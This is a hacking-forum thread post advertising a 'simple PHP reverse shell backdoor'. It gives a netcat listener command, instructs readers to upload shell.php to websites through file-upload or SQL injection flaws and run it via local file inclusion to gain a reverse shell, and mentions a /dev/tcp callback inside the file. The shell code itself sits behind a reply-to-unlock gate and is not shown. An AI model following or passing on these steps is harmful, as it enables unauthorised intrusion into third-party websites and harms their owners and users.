SIMPLE PHP REVERSE SHELL BACKDOOR

SudoDragon

Infinity Member
Joined
September 6, 2025
Messages
1,552
Reaction score
32,703
Points
113
  • Thread Author
  • #1
First, listen for incoming connections: nc -l -p 4444

Upload shell.php to a site via file upload vulnerability or sqli, view shell.php via url in browser thanks to LFI(Local File Inclusion) vulnerability and get reverse shell!

To see this hidden content, you need to "Reply & React" with one of the following reactions: Like, Love, Haha, Wow
Note: Remove "#(/dev/tcp/ip/port)" from shell.php
 
  • Tags
    backdoor exploit cybersecurity php security reverse shell web hacking